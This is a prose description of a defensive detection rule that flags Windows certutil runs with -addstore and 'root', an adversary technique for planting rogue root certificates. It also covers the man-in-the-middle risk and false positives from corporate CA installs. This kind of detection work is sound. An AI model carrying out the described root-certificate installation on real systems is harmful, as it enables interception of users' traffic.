This detection rule aims to identify instances where the Windows command-line utility `certutil` is used to install a new root certificate on a system. This behavior is of particular concern because adversaries often leverage this technique to avoid security warnings when connecting to malicious web servers they control. The rule monitors for the execution of `certutil` specifically with the `-addstore` argument, indicating that a certificate is being added to the certificate store, along with ensuring that the specific word 'root' is present in the command line, which denotes that the added certificate is a root certificate. The method of detection is applicable in environments where the integrity of the certificate store is paramount, as the addition of unauthorized root certificates can open the door to man-in-the-middle attacks and other forms of data interception by bad actors. False positives are primarily expected to stem from legitimate IT operations, like corporate Root CA installations, which necessitates proper tuning of this rule for effective deployment.